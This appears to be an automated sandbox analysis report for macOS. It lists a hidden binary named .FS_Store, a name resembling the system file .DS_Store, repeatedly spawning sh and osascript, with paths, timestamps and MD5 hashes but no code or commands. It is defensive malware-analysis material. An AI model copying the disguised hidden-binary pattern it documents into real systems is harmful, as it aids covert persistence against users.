Analysis Process: sh PID: 790 Parent PID: 788

General

Start time:18:07:23
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 790 Parent PID: 788

General

Start time:18:07:23
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 791 Parent PID: 704

General

Start time:18:07:24
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 792 Parent PID: 791

General

Start time:18:07:24
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 793 Parent PID: 791

General

Start time:18:07:24
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 793 Parent PID: 791

General

Start time:18:07:24
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 794 Parent PID: 704

General

Start time:18:07:25
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 795 Parent PID: 794

General

Start time:18:07:25
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 796 Parent PID: 794

General

Start time:18:07:25
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 796 Parent PID: 794

General

Start time:18:07:25
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 797 Parent PID: 704

General

Start time:18:07:26
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 798 Parent PID: 797

General

Start time:18:07:26
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 799 Parent PID: 797

General

Start time:18:07:26
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 799 Parent PID: 797

General

Start time:18:07:26
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 800 Parent PID: 704

General

Start time:18:07:27
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 801 Parent PID: 800

General

Start time:18:07:27
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 802 Parent PID: 800

General

Start time:18:07:27
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 802 Parent PID: 800

General

Start time:18:07:27
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 803 Parent PID: 704

General

Start time:18:07:28
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 804 Parent PID: 803

General

Start time:18:07:28
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 805 Parent PID: 803

General

Start time:18:07:28
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 805 Parent PID: 803

General

Start time:18:07:28
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 806 Parent PID: 704

General

Start time:18:07:29
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 807 Parent PID: 806

General

Start time:18:07:29
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 808 Parent PID: 806

General

Start time:18:07:29
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 808 Parent PID: 806

General

Start time:18:07:29
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 809 Parent PID: 704

General

Start time:18:07:30
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 810 Parent PID: 809

General

Start time:18:07:30
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 811 Parent PID: 809

General

Start time:18:07:30
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 811 Parent PID: 809

General

Start time:18:07:30
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 812 Parent PID: 704

General

Start time:18:07:31
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 813 Parent PID: 812

General

Start time:18:07:31
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 814 Parent PID: 812

General

Start time:18:07:31
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 814 Parent PID: 812

General

Start time:18:07:31
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 815 Parent PID: 704

General

Start time:18:07:32
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 816 Parent PID: 815

General

Start time:18:07:32
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 817 Parent PID: 815

General

Start time:18:07:32
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 817 Parent PID: 815

General

Start time:18:07:32
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 818 Parent PID: 704

General

Start time:18:07:33
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 819 Parent PID: 818

General

Start time:18:07:33
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 820 Parent PID: 818

General

Start time:18:07:33
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 820 Parent PID: 818

General

Start time:18:07:33
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 821 Parent PID: 704

General

Start time:18:07:34
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 822 Parent PID: 821

General

Start time:18:07:34
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 823 Parent PID: 821

General

Start time:18:07:34
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 823 Parent PID: 821

General

Start time:18:07:34
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 824 Parent PID: 704

General

Start time:18:07:35
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 825 Parent PID: 824

General

Start time:18:07:35
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 826 Parent PID: 824

General

Start time:18:07:35
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 826 Parent PID: 824

General

Start time:18:07:35
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 827 Parent PID: 704

General

Start time:18:07:36
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 828 Parent PID: 827

General

Start time:18:07:36
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 829 Parent PID: 827

General

Start time:18:07:36
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 829 Parent PID: 827

General

Start time:18:07:36
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 830 Parent PID: 704

General

Start time:18:07:37
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 831 Parent PID: 830

General

Start time:18:07:37
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 832 Parent PID: 830

General

Start time:18:07:37
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 832 Parent PID: 830

General

Start time:18:07:37
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 833 Parent PID: 704

General

Start time:18:07:38
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 834 Parent PID: 833

General

Start time:18:07:38
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 835 Parent PID: 833

General

Start time:18:07:38
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 835 Parent PID: 833

General

Start time:18:07:38
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 836 Parent PID: 704

General

Start time:18:07:39
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 837 Parent PID: 836

General

Start time:18:07:39
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 838 Parent PID: 836

General

Start time:18:07:39
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 838 Parent PID: 836

General

Start time:18:07:39
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 839 Parent PID: 704

General

Start time:18:07:40
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 840 Parent PID: 839

General

Start time:18:07:40
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 841 Parent PID: 839

General

Start time:18:07:40
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 841 Parent PID: 839

General

Start time:18:07:40
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 842 Parent PID: 704

General

Start time:18:07:41
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 843 Parent PID: 842

General

Start time:18:07:41
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 844 Parent PID: 842

General

Start time:18:07:41
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 844 Parent PID: 842

General

Start time:18:07:41
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 845 Parent PID: 704

General

Start time:18:07:42
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 846 Parent PID: 845

General

Start time:18:07:42
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 847 Parent PID: 845

General

Start time:18:07:42
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 847 Parent PID: 845

General

Start time:18:07:42
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 848 Parent PID: 704

General

Start time:18:07:43
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 849 Parent PID: 848

General

Start time:18:07:43
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 850 Parent PID: 848

General

Start time:18:07:43
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 850 Parent PID: 848

General

Start time:18:07:43
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 851 Parent PID: 704

General

Start time:18:07:44
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 852 Parent PID: 851

General

Start time:18:07:44
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 853 Parent PID: 851

General

Start time:18:07:44
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 853 Parent PID: 851

General

Start time:18:07:44
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 854 Parent PID: 704

General

Start time:18:07:45
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 855 Parent PID: 854

General

Start time:18:07:45
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 856 Parent PID: 854

General

Start time:18:07:45
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 856 Parent PID: 854

General

Start time:18:07:45
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 857 Parent PID: 704

General

Start time:18:07:46
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 858 Parent PID: 857

General

Start time:18:07:46
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 859 Parent PID: 857

General

Start time:18:07:46
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 859 Parent PID: 857

General

Start time:18:07:46
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 860 Parent PID: 704

General

Start time:18:07:47
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 861 Parent PID: 860

General

Start time:18:07:47
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 862 Parent PID: 860

General

Start time:18:07:47
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 862 Parent PID: 860

General

Start time:18:07:47
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 863 Parent PID: 704

General

Start time:18:07:48
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities

Analysis Process: sh PID: 864 Parent PID: 863

General

Start time:18:07:48
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: sh PID: 865 Parent PID: 863

General

Start time:18:07:48
Start date:16/06/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

Chronological Activities

Analysis Process: osascript PID: 865 Parent PID: 863

General

Start time:18:07:48
Start date:16/06/2017
Path:/usr/bin/osascript
File size:42928 bytes
MD5 hash:204848f1335ae82d1dad8403c341056d

Chronological Activities

Analysis Process: .FS_Store PID: 866 Parent PID: 704

General

Start time:18:07:49
Start date:16/06/2017
Path:/var/root/Library/.FS_Store
File size:18492 bytes
MD5 hash:8fe94843a3e655209c57af587849ac3a

Chronological Activities